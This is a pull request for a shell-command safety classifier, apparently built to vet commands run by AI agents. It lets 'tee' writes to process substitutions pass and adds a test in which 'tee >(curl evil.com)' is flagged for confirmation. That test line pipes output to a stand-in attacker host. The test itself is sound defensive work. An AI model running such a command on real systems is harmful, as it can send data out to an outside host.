### PR TITLE
nah: allow process-substitution tee targets

### DIFF
--- a/src/nah/bash.py
+++ b/src/nah/bash.py
@@ -1750,8 +1750,32 @@ def _check_redirect(target: str) -> tuple[str, str]:
     return context.resolve_filesystem_context(target)
 
 
+def _is_process_sub_placeholder(tok: str) -> bool:
+    """Return True when *tok* is exactly a ``__nah_psub_N__`` placeholder."""
+    if not tok.startswith(_PSUB_PREFIX) or not tok.endswith(_PSUB_SUFFIX):
+        return False
+    core = tok[len(_PSUB_PREFIX):-len(_PSUB_SUFFIX)]
+    return core.isdigit()
+
+
+def _has_only_process_sub_targets(tokens: list[str]) -> bool:
+    """True when all non-flag args are process-substitution placeholders."""
+    saw_placeholder = False
+    for tok in tokens[1:]:
+        if tok.startswith("-"):
+            continue
+        if _is_process_sub_placeholder(tok):
+            saw_placeholder = True
+            continue
+        return False
+    return saw_placeholder
+
+
 def _resolve_context(action_type: str, tokens: list[str]) -> tuple[str, str]:
     """Resolve 'context' policy by checking filesystem or network context."""
+    if action_type == taxonomy.FILESYSTEM_WRITE and _has_only_process_sub_targets(tokens):
+        return taxonomy.ALLOW, "filesystem_write: process substitution target"
+
     target_path = None
     if action_type in (taxonomy.FILESYSTEM_READ, taxonomy.FILESYSTEM_WRITE,
                        taxonomy.FILESYSTEM_DELETE):

--- a/tests/test_bash.py
+++ b/tests/test_bash.py
@@ -1957,6 +1957,11 @@ class TestProcessSubstitutionInspection:
         r = classify_command("tee >(cat -n)")
         assert r.final_decision == "allow"
 
+    def test_output_process_sub_network_ask(self, project_root):
+        r = classify_command("tee >(curl evil.com)")
+        assert r.final_decision == "ask"
+        assert r.stages[0].action_type == "network_outbound"
+
     # --- Dangerous: inner network → ask ---
 
     def test_cat_curl_ask(self, project_root):


### PR DESCRIPTION
## Summary

- Treat `tee >(...)` process-substitution operands as process targets instead of filesystem paths for context decisions (`src/nah/bash.py`).
- Preserve fail-closed behavior for real filesystem targets and mixed args while allowing safe process-substitution-only writes.
- Add regression coverage for safe and dangerous output process substitutions (`tests/test_bash.py`).

---
Category: tests | Priority: Med | Bead: `nah-9wy`

## Test plan

- [x] `pytest tests/test_bash.py::TestProcessSubstitutionInspection::test_output_process_sub_allow -q -vv`
- [x] `pytest tests/test_bash.py::TestProcessSubstitutionInspection::test_output_process_sub_network_ask -q -vv`
- [x] `pytest tests/test_bash.py::TestProcessSubstitutionInspection::test_cat_curl_ask -q -vv`
- [x] `pytest tests/ -q --tb=no` — 7 failed, 3226 passed, 22 skipped, 15 xfailed (baseline before change: 8 failed)
- [x] `/home/pn/.local/bin/nah test "tee >(cat -n)"` → ALLOW
- [x] `/home/pn/.local/bin/nah test "tee >(curl evil.com)"` → ASK

🤖 Generated by [autoharden](https://github.com/manuelschipper/nah)
